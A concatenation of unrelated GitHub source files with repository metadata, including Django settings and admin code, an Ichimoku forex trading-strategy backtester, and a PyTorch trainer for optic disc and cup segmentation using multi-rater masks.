            # environment variables / a secrets store.
            'PASSWORD': 'postgres',
            'HOST': 'db'
        }
    }
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
|
[
"arron.moore93@gmail.com"
] |
arron.moore93@gmail.com
|
a47f4334ddb60f8f67f9a7edac853de8ffff5e6a
|
e461234a9898186795e2bb7938d7fc8bf05d988b
|
/ichimoku_strategy.py
|
9b39f64c9ac1e82825d0fb676dff376f96069b84
|
[] |
no_license
|
hajtos/PYTHON_Ichimoku
|
46e13139b2986b6e66745f447f02cfc35a9d4f89
|
c7d5d5389da0fada5d089048c953d7b03a92dd62
|
refs/heads/master
| 2020-04-07T05:37:48.339847
| 2019-01-29T18:58:41
| 2019-01-29T18:58:41
| 158,103,260
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,499
|
py
|
from strategy import Strategy
class ZigZag:
    """Piecewise-linear "zig-zag" reduction of a close-price series.

    A new peak is recorded whenever price retraces by more than *fraction*
    of the previous swing.  Calling the instance interpolates the swing's
    linear contribution at a given index (see __call__).
    """
    def __init__(self, fraction, graph):
        # Seed with the first close, then skip the initial flat stretch to
        # decide the starting direction (+1 rising, -1 falling).
        self.peaks = [(0, graph.close(0))]
        i = 1
        while graph.close(i) == graph.close(0):
            i += 1
        direction = 1 if graph.close(i) >= graph.close(0) else -1
        curr_peak = graph.close(i)
        peak_index = i
        self.graph = graph
        for i in range(i, len(graph.ask_candles)):
            if (graph.close(i) - curr_peak) * direction > 0:
                # Trend continues: extend the current extreme.
                curr_peak = graph.close(i)
                peak_index = i
            elif (graph.close(i) - curr_peak) / (self.peaks[-1][1] - curr_peak) > fraction:
                # Retracement exceeded *fraction* of the last swing: lock in
                # the peak and flip direction.
                # NOTE(review): divides by (previous peak - current extreme);
                # a zero-height swing would raise ZeroDivisionError — confirm
                # the inputs make that impossible.
                self.peaks.append((peak_index, curr_peak))
                direction *= -1
                curr_peak = graph.close(i)
                peak_index = i
        # Close the series: record the last extreme and the final close.
        i = len(graph.ask_candles) - 1
        self.peaks.append((peak_index, curr_peak))
        self.peaks.append((i, graph.close(i)))
    def __call__(self, index, history_wall):
        """Linear price change of the enclosing swing from its start to *index*.

        The swing's right end is clipped at *history_wall* (the last index
        considered "known"); *index* must lie strictly before it.
        """
        assert index < history_wall
        peak_index = 0
        while self.peaks[peak_index][0] < index:
            peak_index += 1
        right_side = min([history_wall, self.peaks[peak_index][0]])
        left_side = self.peaks[peak_index - 1][0]
        return (index - left_side) * (self.graph.close(right_side) - self.graph.close(left_side)) \
            / (right_side - left_side)
class IchimokuStrategy(Strategy):
    """Trading strategy driven by Ichimoku Kinko Hyo indicator lines.

    Entries come from tenkan/kijun crosses (signal type 1) and price/kumo
    crosses (signal type 3), cross-checked against higher-timeframe graphs:
    self.graphs[0] appears to be a daily chart and self.graphs[1] a weekly
    chart — TODO confirm against the Strategy base class.
    """
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.start_needed = 26   # bars of history required (Ichimoku lookback)
        self.last_close = -1     # index at which the last transaction closed
        self.max_age = 5         # maximum signal age (bars) still considered fresh
        self.zigzag = ZigZag(0.09, self.graph)
    def manage_transaction(self, index, direction, multiplier=1.0):
        """Walk forward from *index* until stop-loss or take-profit is hit.

        Returns exit_level - tran_open (the signed price difference).
        *direction* is +1 long / -1 short; *multiplier* is currently unused.
        """
        i = index
        sl = self.sl
        tran_open = self.tran_open
        #times = 1
        while True:
            candle = self.graph.bid_candles[i]
            # Signed distance of the adverse extreme to the stop-loss and of
            # the favourable extreme to the take-profit.
            to_sl = ((candle.low if direction == 1 else candle.high) - sl) * direction
            to_tp = ((candle.low if direction == -1 else candle.high) - self.tp) * direction
            """
            ########################################################################
            Przy wyjsciu z transakcji wypisuje:
            date wyjscia, na jakim poziomie sie skonczylo i wynik
            """
            # (Polish note above: on exit, print the exit date, the level it
            # ended at, and the result.)
            if to_sl < 0:
                self.last_close = i
                print("Result: date-{}, end-{}, result-{}".format(self.graph.dates[i], sl, sl - tran_open))
                return sl - tran_open
            if to_tp > 0:
                self.last_close = i
                print("Result: date-{}, end-{}, result-{}".format(self.graph.dates[i], self.tp, self.tp - tran_open))
                return self.tp - tran_open
            """
            if candle.close > tran_open + times*(tran_open - self.sl):
                if times == 1:
                    sl = tran_open
                elif times == 4:
                    self.last_close = i
                    return times*(tran_open - self.sl)
                else:
                    sl = self.graph.kijun_sen(i)
                times += 1
            """
            # NOTE(review): no bounds check — if neither level is hit before
            # the candle data ends this indexes past the array; confirm the
            # caller guarantees an exit.
            i += 1
    def get_signal(self, index, direction):
        """Return (signal_type, age) for *direction* at *index*, else (0, 0).

        Type 1: tenkan above/below kijun and the (26-bar-shifted) kumo,
        confirmed by the daily close vs daily kijun.  Type 3: price outside
        the kumo.  The freshest qualifying signal wins and must be at most
        self.max_age bars old.
        """
        # signal 1 kijun-tenkan cross, kumo adjusting required
        signal1_present = (self.graph.tenkan_sen(index) - self.graph.kijun_sen(index)) * direction > 0 \
            and (self.graph.tenkan_sen(index) - self.graph.senkou_span_A(index - 26)) * direction > 0 \
            and (self.graph.tenkan_sen(index) - self.graph.senkou_span_B(index - 26)) * direction > 0
        wykres1D = self.graphs[0]  # "wykres 1D" = the daily chart
        index1D = wykres1D.get_my_index_for(self.graph.dates[index])
        signal1_present = signal1_present and (wykres1D.close(index1D) - wykres1D.kijun_sen(index1D)) * direction > 0
        signal1_age = 1
        while (self.graph.tenkan_sen(index - signal1_age) - self.graph.kijun_sen(index - signal1_age)) * direction > 0:
            signal1_age += 1
        # signal 2 kumo cross
        #signal2_present = (self.graph.senkou_span_A(index) - self.graph.senkou_span_B(index)) * direction > 0
        #signal2_age = 1
        #while (self.graph.senkou_span_A(index - signal2_age) - self.graph.senkou_span_B(index - signal2_age)) * direction > 0:
        #    signal2_age += 1
        # signal 3 graph crossing kumo
        signal3_present = (self.graph.close(index) - self.graph.senkou_span_A(index)) * direction > 0 \
            and (self.graph.close(index) - self.graph.senkou_span_B(index)) * direction > 0
        signal3_age = 1
        while (self.graph.close(index - signal3_age) - self.graph.senkou_span_A(index - signal3_age)) * direction > 0 \
                and (self.graph.close(index - signal3_age) - self.graph.senkou_span_B(index - signal3_age)) * direction > 0:
            signal3_age += 1
        signals = [(t, age) for t, pres, age in [(1, signal1_present, signal1_age),
                                                 (3, signal3_present, signal3_age)] if pres]
        if signals and min(s[1] for s in signals) <= self.max_age:
            return min(signals, key=lambda x: x[1])
        return (0, 0)
    def stoploss(self, index, signal, signal_type):
        """Stop-loss level for a trade at *index*; None for unknown types.

        *signal* is the direction (+1/-1).  Type 1 anchors just beyond the
        kijun-sen; type 3 uses the far edge of the kumo.
        """
        if signal_type == 1:
            return self.graph.kijun_sen(index) - signal * 0.0002
        if signal_type == 3:
            linie = [self.graph.senkou_span_B(index), self.graph.senkou_span_A(index)]  # "linie" = lines
            return min(linie) if signal == 1 else max(linie)
        return None
    def takeprofit(self, index, signal, signal_type):
        """Take-profit from the weekly graph's nearest resistance/support."""
        week_graph = self.graphs[1]
        week_index = week_graph.get_my_index_for(self.graph.dates[index])
        # NOTE(review): *signal* is a direction (+1/-1), so `signal == 3`
        # can never be true — possibly signal_type was intended; confirm.
        if signal == 1 or signal == 3:
            return week_graph.najblizszy_opor(week_index)       # nearest resistance
        elif signal == -1:
            return week_graph.najblizsze_wsparcie(week_index)   # nearest support
        return None
    def check_for_entry(self, index):
        """Open a transaction at *index* if a fresh, unopposed signal has a
        reward/risk ratio above 2; returns the direction, else falsy."""
        if index <= self.last_close:
            return False
        # Trade in the direction the tenkan-sen is currently moving.
        direction = 1 if self.graph.tenkan_sen(index) > self.graph.tenkan_sen(index - 1) else -1
        #if direction * (self.graph.close(index) - self.graph.close(index - 26)) < 0:
        #    return False
        signal_type, age = self.get_signal(index, direction)
        anti_signal, _ = self.get_signal(index, -direction)
        if not signal_type or anti_signal:
            return False
        stoploss = self.stoploss(index, direction, signal_type)
        takeprofit = self.takeprofit(index, direction, signal_type)
        current = self.graph.ask_close(index)
        if takeprofit is None or stoploss is None:
            return False
        ratio = (takeprofit - current)/(current - stoploss)
        """
        ########################################################################
        Niezaleznie od stosunku takeprofit do stoploss wypisuje:
        index, date, kierunke(1, -1), takeprofit, stoploss, obecna cene i stosunek
        """
        # (Polish note above: regardless of the ratio, print index, date,
        # direction, takeprofit, stoploss, current price and the ratio.)
        # NOTE(review): uses graph.date(index) here but graph.dates[index]
        # elsewhere — confirm the graph object provides both.
        print(index, self.graph.date(index), direction, takeprofit, stoploss, current, ratio)
        if signal_type and ratio > 2.:
            self.sl = stoploss
            # Actual TP is set to 3R (three times the stop distance).
            self.tp = 3 * current - 2 * stoploss
            self.tran_open = current
            """#######################################################
            W momencie wejscia wypisuje:
            date, kierunek, takeprofit(faktyczny próbowany) i stoploss
            """
            # (Polish note above: on entry, print date, direction, the actual
            # attempted takeprofit, and the stoploss.)
            print("Enter: date-{}, direction-{}, edge-{}, sl-{}".format(
                self.graph.dates[index], direction, self.tp, stoploss))
            return direction
|
[
"hajtos2@gmail.com"
] |
hajtos2@gmail.com
|
fbca50ebf0262d7c137ebc41118f7bd0b71c47de
|
674649dc02390c4a60b9c62b586b81d405969047
|
/network/__init__.py
|
19f1226938b882bcbc77dc6b13f7782a531efc6f
|
[] |
no_license
|
weijiawu/Pytorch_Classification
|
709513be3e019a896ef11a1739829a97bb99c9db
|
7609a1d809590c1423f4ed0ee1f0d918954355a9
|
refs/heads/master
| 2022-12-06T00:51:26.716590
| 2020-09-01T07:38:22
| 2020-09-01T07:38:22
| 285,811,133
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,252
|
py
|
from __future__ import absolute_import
"""The models subpackage contains definitions for the following model for CIFAR10/CIFAR100
architectures:
- `AlexNet`_
- `VGG`_
- `ResNet`_
- `SqueezeNet`_
- `DenseNet`_
You can construct a model with random weights by calling its constructor:
.. code:: python
import torchvision.models as models
resnet18 = models.resnet18()
alexnet = models.alexnet()
squeezenet = models.squeezenet1_0()
densenet = models.densenet_161()
We provide pre-trained models for the ResNet variants and AlexNet, using the
PyTorch :mod:`torch.utils.model_zoo`. These can be constructed by passing
``pretrained=True``:
.. code:: python
import torchvision.models as models
resnet18 = models.resnet18(pretrained=True)
alexnet = models.alexnet(pretrained=True)
ImageNet 1-crop error rates (224x224)
======================== ============= =============
Network Top-1 error Top-5 error
======================== ============= =============
ResNet-18 30.24 10.92
ResNet-34 26.70 8.58
ResNet-50 23.85 7.13
ResNet-101 22.63 6.44
ResNet-152 21.69 5.94
Inception v3 22.55 6.44
AlexNet 43.45 20.91
VGG-11 30.98 11.37
VGG-13 30.07 10.75
VGG-16 28.41 9.62
VGG-19 27.62 9.12
SqueezeNet 1.0 41.90 19.58
SqueezeNet 1.1 41.81 19.38
Densenet-121 25.35 7.83
Densenet-169 24.00 7.00
Densenet-201 22.80 6.43
Densenet-161 22.35 6.20
======================== ============= =============
.. _AlexNet: https://arxiv.org/abs/1404.5997
.. _VGG: https://arxiv.org/abs/1409.1556
.. _ResNet: https://arxiv.org/abs/1512.03385
.. _SqueezeNet: https://arxiv.org/abs/1602.07360
.. _DenseNet: https://arxiv.org/abs/1608.06993
"""
# from .alexnet import *
# from .vgg import *
# from .resnet import *
# from .resnext import *
# from .wrn import *
# from .preresnet import *
# from .densenet import *
|
[
"wwj123@zju.edu.cn"
] |
wwj123@zju.edu.cn
|
c90fa5d1e85ccb1e4f8644e66559e019c9bd42f2
|
afead29a6bad77ecb242f8ad8daf23b940597670
|
/MRNet_code/trainer/trainer_cvpr.py
|
9989f1801d25ac6bab3f332df4ec99d13527c190
|
[
"MIT"
] |
permissive
|
ShikunLi/MRNet
|
6212b79df59618fd2cf361cb9cf0f395e0124deb
|
0778f52abb19fd4ae29a5ede21c06afa37c11ba4
|
refs/heads/main
| 2023-08-27T22:38:38.463251
| 2021-11-04T14:20:42
| 2021-11-04T14:20:42
| 427,638,865
| 1
| 0
|
MIT
| 2021-11-13T10:53:05
| 2021-11-13T10:53:04
| null |
UTF-8
|
Python
| false
| false
| 18,819
|
py
|
# -*- coding: utf-8 -*-
import math
import datetime
import losses
import os
from tqdm import tqdm
from utils.dice_loss import *
import torch.nn.functional as F
import numpy as np
from skimage import io
from tensorboardX import SummaryWriter
from torch.optim import lr_scheduler
from torch.autograd import Variable
import torch
# Module-level TensorBoard writer (closed by Trainer.train when max_iter is
# reached) and running-loss accumulators declared `global` by train_epoch.
writer = SummaryWriter()
running_loss_final = 0
running_loss_sub = 0
running_final = 0
class Trainer(object):
    def __init__(self, cuda, model_rgb, model_six,model_att,optimizer_rgb,optimizer_six,optimizer_att,
                 train_sub,val_sub,train_loader, val_loader,test_loader,test_sub,max_iter,
                 snapshot, outpath, sshow, step_size, gamma,log_name,val_out_path,size_average=False):
        """Bundle the three sub-models, their optimizers, the datasets/loaders
        and the training hyper-parameters for this trainer.

        step_size/gamma configure the StepLR schedule used by train()
        (step_size <= 0 disables it).  snapshot, outpath, sshow, log_name and
        val_out_path are presumably checkpoint/logging settings consumed by
        train_epoch — TODO confirm in the rest of the file.
        """
        self.cuda = cuda
        # Sub-networks: RGB backbone, six-rater branch, attention module.
        self.model_rgb = model_rgb
        self.model_six = model_six
        self.model_att = model_att
        self.optim_rgb = optimizer_rgb
        self.optim_six = optimizer_six
        self.optim_att = optimizer_att
        # Datasets and loaders for the train/val/test splits.
        self.train_sub = train_sub
        self.val_sub = val_sub
        self.train_loader = train_loader
        self.val_loader = val_loader
        self.test_loader = test_loader
        self.test_sub = test_sub
        # Progress counters advanced by train()/train_epoch().
        self.epoch = 0
        self.iteration = 0
        self.max_iter = max_iter
        self.snapshot = snapshot
        self.outpath = outpath
        self.sshow = sshow
        self.step_size = step_size
        self.gamma = gamma
        self.log_name = log_name
        self.val_out_path = val_out_path
        self.size_average = size_average
    def train(self):
        """Run epochs of train_epoch until self.max_iter iterations are done."""
        # Number of epochs needed for max_iter iterations over the training set.
        max_epoch = int(math.ceil(1. * self.max_iter / len(self.train_sub)))
        if self.step_size > 0:
            # NOTE(review): only the RGB optimizer is scheduled; optim_six and
            # optim_att run at a fixed learning rate — confirm this is intended.
            scheduler=lr_scheduler.StepLR(optimizer=self.optim_rgb, step_size=self.step_size, gamma=self.gamma)
        for epoch in range(max_epoch):
            self.epoch = epoch
            with tqdm(total=len(self.train_sub), desc=f'Epoch {epoch+1}/{max_epoch}',unit='img',leave=True) as pbar:
                self.train_epoch(pbar)
            if self.step_size > 0:
                scheduler.step()
            if self.iteration >= self.max_iter:
                # Flush and close the module-level TensorBoard writer once done.
                writer.close()
                break
def train_epoch(self,pbar):
self.model_rgb.train()
self.model_six.train()
self.model_att.train()
for batch_idx, data in enumerate(self.train_loader):
imgs = data['image']
imgs_o = data['image_ori']
target = data['mask']
iteration = batch_idx + self.epoch * len(self.train_loader)
if self.iteration != 0 and (iteration - 1) != self.iteration:
continue # for resuming
self.iteration = iteration
if self.iteration >= self.max_iter:
break
if self.cuda:
imgs_o, imgs= imgs_o.cuda(), imgs.cuda()
target = [x.cuda() for x in target]
imgs_o = Variable(imgs_o) # [Batch_size, C, H, W] or [B, 3, 256, 256]
imgs = Variable(imgs).to(dtype=torch.float32) # [Batch_size, C, H, W] or [B, 3, 256, 256]
target = [Variable(x) for x in target] # [a1,a2,...,a6], a1=[Batch_size,C,H,W] or [b, 2, 256, 256]
n, c, h, w = imgs.size()
global running_loss_final
global running_loss_sub
global running_final
criterion = losses.init_loss('BCE_logit').cuda()
criterion_c = losses.init_loss('ContrastiveLoss').cuda()
""""""""""" ~~~Your Framework~~~ """""""""
n_rater = torch.randint(1,7,(n,))
cond_m = torch.tensor([0]).expand(n, 6).to(dtype=torch.float32)
for i in range(n):
cond_m[i, n_rater[i] - 1] = 1.0
cond_p = torch.randint(1,11,(n,6),dtype=torch.float32)
cond_ave = torch.tensor([[1/6]]).expand(n,6).to(dtype=torch.float32)
if self.cuda:
cond_m = cond_m.cuda()
cond_p = cond_p.cuda()
cond_ave = cond_ave.cuda()
for i in range(0,n):
cond_p[i,:] = (cond_p[i,:] / torch.sum(cond_p[i,:])).to(dtype=torch.float32)
'''final mask'''
# original six rater masks
f_mask_list = []
# condition masks
final_mask_list_m = []
final_mask_list_p = []
final_mask_list_ave = []
for i, rater_i_mask in enumerate(target):
rater_i_mask = rater_i_mask.to(dtype=torch.float32)
final_mask_list_p.append(torch.mul(rater_i_mask, cond_p[:,i].unsqueeze(-1).
unsqueeze(-1).unsqueeze(-1).expand(-1,2,256,256)))
final_mask_list_m.append(torch.mul(rater_i_mask, cond_m[:, i].unsqueeze(-1).
unsqueeze(-1).unsqueeze(-1).expand(-1, 2, 256, 256)))
final_mask_list_ave.append(torch.mul(rater_i_mask, 1/6))
f_mask_list.append(rater_i_mask)
final_mask_m = sum(final_mask_list_m)
final_mask_p = sum(final_mask_list_p)
final_mask_ave = sum(final_mask_list_ave)
outputs_m,f_m = self.model_rgb(imgs,cond_m)
outputs_p,f_p = self.model_rgb(imgs,cond_p)
outputs_ave,f_ave = self.model_rgb(imgs,cond_ave)
loss_m = criterion(outputs_m, final_mask_m)
loss_p = criterion(outputs_p, final_mask_p)
loss_ave = criterion(outputs_ave, final_mask_ave)
""""""""""""""""""""""""""""""""""""""""""
""""""""""" ~~~Reconstruction Net~~~ """""""""
out_m, out_p, out_ave = outputs_m.detach(), outputs_p.detach(),outputs_ave.detach()
out_six_m = self.model_six(imgs, out_m, cond_m)
out_six_p = self.model_six(imgs, out_p, cond_p)
out_six_ave = self.model_six(imgs, out_ave, cond_ave)
loss_six_m = []
loss_six_p = []
loss_six_ave = []
for i in range(6):
l_m= criterion(out_six_m[i], f_mask_list[i])
l_p = criterion(out_six_p[i], f_mask_list[i])
l_ave = criterion(out_six_ave[i], f_mask_list[i])
loss_six_m.append(l_m)
loss_six_p.append(l_p)
loss_six_ave.append(l_ave)
loss_sub_all = (sum(loss_six_m)/ 6 + sum(loss_six_p)/ 6 + sum(loss_six_ave)/ 6) /3
running_loss_sub += loss_sub_all.item()
self.optim_six.zero_grad()
loss_sub_all.backward()
self.optim_six.step()
# loss calculate
loss_six_ave_new = []
out_six_ave_new = self.model_six(imgs, out_ave, cond_ave, flag=False)
out_six_ave_mask = self.model_six(imgs, final_mask_ave, cond_ave, flag=False)
for i in range(6):
loss_i = criterion_c(out_six_ave_new[i],out_six_ave_mask[i])
loss_six_ave_new.append(loss_i)
loss_reconstruction = sum(loss_six_ave_new) / 1000
loss_all = ((3 * loss_ave + 2 * loss_p + 1 * loss_m) / 6) * 0.7 + loss_reconstruction *0.3
running_loss_final += loss_all.item()
self.optim_rgb.zero_grad()
loss_all.backward()
self.optim_rgb.step()
O_p = sum(out_six_p)
""""""""""""""""""""""""""""""""""""""""""
""""""""""" ~~~Uncertainty Soft attention~~~ """""""""
o_six_m = [x.detach() for x in out_six_m]
o_six_p = [x.detach() for x in out_six_p]
o_six_ave = [x.detach() for x in out_six_ave]
f_m, f_p, f_ave = f_m.detach(), f_p.detach(), f_ave.detach()
out_final_m,_ = self.model_att(o_six_m,f_m,out_m)
out_final_p,AttentionMap = self.model_att(o_six_p,f_p,out_p)
out_final_ave,_ = self.model_att(o_six_ave, f_ave,out_p)
loss_m_final = criterion(out_final_m, final_mask_m)
loss_p_final = criterion(out_final_p, final_mask_p)
loss_ave_final = criterion(out_final_ave, final_mask_ave)
loss_final = (3 * loss_ave_final + 2 * loss_p_final + 1 * loss_m_final) / 6
loss_final += loss_final.item()
self.optim_att.zero_grad()
loss_final.backward()
self.optim_att.step()
""""""""""""""""""""""""""""""""""""""""""
writer.add_scalar('Loss/train_main', loss_all.item(), iteration)
writer.add_scalar('Loss/train_sub', loss_sub_all.item(), iteration)
writer.add_scalar('Loss/train_final', loss_final.item(), iteration)
pbar.set_postfix(**{'loss (batch)': loss_final.item()})
""""""""""" ~~~record and report~~~ """""""""
# record
if iteration % self.sshow == (self.sshow - 1):
curr_time = str(datetime.datetime.now())[:19]
print('\n [%s,%3d,%6d, Loss: %.3f, The training loss of sub Net:%.3f, and the subnet loss is:%.3f]'%(
curr_time, self.epoch + 1, iteration + 1, running_final / (n*self.sshow),
running_loss_final / (n * self.sshow), running_loss_sub / (n * self.sshow)))
running_loss_final = 0.0
running_loss_sub = 0.0
running_final = 0.0
# report
pbar.update(n)
if iteration % (len(self.train_sub)+len(self.val_sub)) // (2 * n) == 0:
for tag, value in self.model_rgb.named_parameters():
tag = tag.replace('.', '/')
writer.add_histogram('weights/' +tag, value.data.cpu().numpy(), iteration)
writer.add_histogram('grads/' + tag, value.data.cpu().numpy(), iteration)
writer.add_scalar('learning_rate', self.optim_rgb.param_groups[0]['lr'], iteration)
out = torch.sigmoid(outputs_p)
writer.add_images('images_ori', imgs_o, iteration)
writer.add_images('images', imgs, iteration)
writer.add_images('masks/true_cup', final_mask_p[:,1,:,:].unsqueeze(1), iteration)
writer.add_images('masks/pred_cup', out[:,1,:,:].unsqueeze(1), iteration)
writer.add_images('masks/true_disc', final_mask_p[:,0,:,:].unsqueeze(1), iteration)
writer.add_images('masks/pred_disc', out[:,0,:,:].unsqueeze(1), iteration)
writer.add_images('masks/sub_pred_cup', O_p[:, 1, :, :].unsqueeze(1), iteration)
writer.add_images('masks/sub_pred_disc', O_p[:, 0, :, :].unsqueeze(1), iteration)
O_pp = torch.sigmoid(O_p)
writer.add_images('masks/sub_pred_cup_sig', O_pp[:, 1, :, :].unsqueeze(1), iteration)
writer.add_images('masks/sub_pred_disc_sig', O_pp[:, 0, :, :].unsqueeze(1), iteration)
# Attention = [Att_disc,Att_cup,uncertianty_cup,uncertianty_disc]
writer.add_images('attention/Att_disc',AttentionMap[0],iteration)
writer.add_images('attention/Att_cup', AttentionMap[1], iteration)
writer.add_images('attention/uncertianty_cup', AttentionMap[2], iteration)
writer.add_images('attention/uncertianty_disc', AttentionMap[3], iteration)
mask_cup_list = []
mask_disc_list = []
for i in range(len(f_mask_list)):
mask_disc_list.append(f_mask_list[i][:, 0, :, :].unsqueeze(1))
mask_cup_list.append(f_mask_list[i][:, 1, :, :].unsqueeze(1))
mask_cup = torch.cat(mask_cup_list, dim=1)
mask_disc = torch.cat(mask_disc_list, dim=1)
u_cup = torch.std(mask_cup, dim=1).unsqueeze(1)
u_disc = torch.std(mask_disc, dim=1).unsqueeze(1)
writer.add_images('attention/mask_u_cup', u_cup, iteration)
writer.add_images('attention/mask_u_disc', u_disc, iteration)
self.val_epoch(self.epoch,val_flag=True)
def val_epoch(self, epoch, val_flag=True):
print("Preparing for validation.")
self.model_rgb.eval()
self.model_six.eval()
self.model_att.eval()
mask_type = torch.float32
if val_flag:
n_val = len(self.val_sub) # the number of batch
data_loader = self.val_loader
# save checkpoint
savename1 = ('%s/snapshot_iter_%d.pth' % (self.outpath, epoch + 1))
torch.save(self.model_rgb.state_dict(), savename1)
savename2 = ('%s/six_snapshot_iter_%d.pth' % (self.outpath, epoch + 1))
torch.save(self.model_six.state_dict(), savename2)
savename3 = ('%s/att_snapshot_iter_%d.pth' % (self.outpath, epoch + 1))
torch.save(self.model_att.state_dict(), savename3)
print('save: (snapshot: %d)' % (epoch + 1))
else:
n_val = len(self.test_sub)
data_loader = self.test_loader
with tqdm(total=n_val, desc=f'Model test:', leave=True) as pbar:
iou_d = 0
iou_c = 0
tot = 0
bn = 0
disc_dice = 0
cup_dice = 0
disc_hard_dice = 0
cup_hard_dice = 0
n_all = n_val * 5 ## 5 is threhold
for batch_idx, data in enumerate(data_loader):
imgs, target, Name = data['image'],data['mask'],data['name']
if self.cuda:
imgs = imgs.cuda()
target = [x.cuda() for x in target]
imgs = Variable(imgs).to(dtype=mask_type)
target = [Variable(x) for x in target]
b_size = imgs.size(0)
with torch.no_grad():
condition = torch.tensor([[1/6]]).expand(b_size,6).to(dtype=torch.float32) # Default Majority
# condition = torch.randint(1, 11, (b_size, 6), dtype=torch.float32)
if self.cuda:
condition = condition.cuda()
for i in range(0, b_size):
condition[i, :] = (condition[i, :] / torch.sum(condition[i, :])).to(dtype=torch.float32)
'''final mask'''
final_mask_list = []
for i, rater_i_mask in enumerate(target):
rater_i_mask = rater_i_mask.to(dtype=torch.float32)
final_mask_list.append(torch.mul(rater_i_mask, condition[:, i].unsqueeze(-1).
unsqueeze(-1).unsqueeze(-1).expand(-1, 2, 256, 256)))
final_mask = sum(final_mask_list)
'''inference'''
coarse_pred,fea = self.model_rgb(imgs,condition)
six_rater = self.model_six(imgs, coarse_pred,condition)
mask_pred, _ = self.model_att(six_rater, fea, coarse_pred)
tot += F.binary_cross_entropy_with_logits(mask_pred, final_mask).item()
pred = torch.sigmoid(mask_pred)
# hard disc/cup dice
a_mask = (final_mask > 0.5).float()
a_pred = (pred > 0.5).float()
disc_hard_dice += dice_coeff(a_pred[:, 0, :, :], a_mask[:, 0, :, :]).item()
cup_hard_dice += dice_coeff(a_pred[:, 1, :, :], a_mask[:, 1, :, :]).item()
# soft dice : for threshold in [0.5]:
for threshold in [0.1,0.3,0.5,0.7,0.9]:
final_mask_temp = (final_mask >= threshold).float()
pred_t = (pred >= threshold).float()
pred_t_n = pred_t.cpu()
disc_pred = pred_t_n[:,0,:,:].numpy()
cup_pred = pred_t_n[:,1,:,:].numpy()
disc_pred = disc_pred.astype('int32')
cup_pred = cup_pred.astype('int32')
disc_mask = final_mask_temp[:,0,:,:].squeeze().cpu().numpy().astype('int32')
cup_mask = final_mask_temp[:, 1, :, :].squeeze().cpu().numpy().astype('int32')
'''iou for numpy'''
iou_d += iou(disc_pred,disc_mask)
iou_c += iou(cup_pred,cup_mask)
'''dice for torch'''
disc_dice += dice_coeff(pred_t[:,0,:,:], final_mask_temp[:,0,:,:]).item()
cup_dice += dice_coeff(pred_t[:,1,:,:], final_mask_temp[:,1,:,:]).item()
Name_a = Name[0]
'''Save Figure'''
num = pred.shape[0]
for i in range(0, num):
cup_image_np = cup_pred[i, :, :]
disc_image_np = disc_pred[i, :, :]
disc_path = './Out/results/{0}/'.format(Name_a.split('_')[0])
if not os.path.exists(disc_path):
os.makedirs(disc_path)
io.imsave(disc_path + 'task01.png', np.uint8(disc_image_np * 255))
cup_path = './Out/results/{0}/'.format(Name_a.split('_')[0])
io.imsave(cup_path + 'task02.png', np.uint8(cup_image_np * 255))
bn +=1
pbar.update(1)
val_score, disc_iou, cup_iou, d_dice, c_dice = tot / n_val, iou_d / n_all, \
iou_c / n_all, disc_dice / n_all, cup_dice / n_all
cup_hard_dice, disc_hard_dice = cup_hard_dice / n_val, disc_hard_dice / n_val
print('Epoch:', epoch)
if self.model_rgb.num_classes > 1:
print('Validation average cross entropy: {}'.format(val_score))
print('Validation average disc iou: {}'.format(disc_iou))
print('Validation average cup iou: {}'.format(cup_iou))
print('Validation average disc dice: {}'.format(d_dice))
print('Validation average cup dice: {}'.format(c_dice))
print('Validation hard_0.5 disc dice: {}'.format(disc_hard_dice))
print('Validation hard_0.5 cup dice: {}'.format(cup_hard_dice))
if val_flag:
writer.add_scalar('Loss_ave/test', val_score, epoch)
writer.add_scalar('Val/disc_soft_dice',d_dice, epoch)
writer.add_scalar('Val/cup_soft_dice', c_dice, epoch)
writer.add_scalar('Val/disc_hard_dice', disc_hard_dice, epoch)
writer.add_scalar('Val/cup_hard_dice', cup_hard_dice, epoch)
print("Finshed on validation.")
|
[
"noreply@github.com"
] |
noreply@github.com
|
53c54b3bb8aa86926e8da089255feac5d79acd81
|
703f96e9e02eea9271f0600a0a43bfdc8ba68a39
|
/src/door.py
|
ca09a77dd42f6960f44ffee69564c7618222be24
|
[] |
no_license
|
den01-python-programming-exercises/exercise-4-6-door-JaimePSantos
|
783ce7f49fc377cb2ecad8e0fd25170fcfb91b65
|
2f71b62c51ea312c7d47b6c34cf42e856af5fc40
|
refs/heads/master
| 2022-12-31T17:36:55.887119
| 2020-10-23T18:23:23
| 2020-10-23T18:23:23
| 306,714,208
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 77
|
py
|
class Door:
def knock(self):
string = "Who's there?"
return string
|
[
"jaimepereirasantos123@gmail.com"
] |
jaimepereirasantos123@gmail.com
|
2253f51070af3a30cfaaadf9e925f042bb219d46
|
b1e26b026b9ba4bb15a1637bcadd1132483d641d
|
/crm/admin.py
|
f75b295b5e3ef9273d2e606d7e8dc958bbe9fc19
|
[] |
no_license
|
ISQA-3900/assignment-2---django---integrated-multi-table-app-nmogulla
|
9dba15c91f7c9c929531e85504fe83104c23217d
|
63002302522abe1390d870941984d935dbe9d70f
|
refs/heads/master
| 2023-08-21T08:36:45.375560
| 2021-10-11T02:10:21
| 2021-10-11T02:10:21
| 413,619,086
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 876
|
py
|
from django.contrib import admin
# Register your models here.
from django.contrib import admin
from .models import Customer, Product, Service
class CustomerList(admin.ModelAdmin):
list_display = ('cust_name', 'organization', 'phone_number')
list_filter = ('cust_name', 'organization')
search_fields = ('cust_name',)
ordering = ['cust_name']
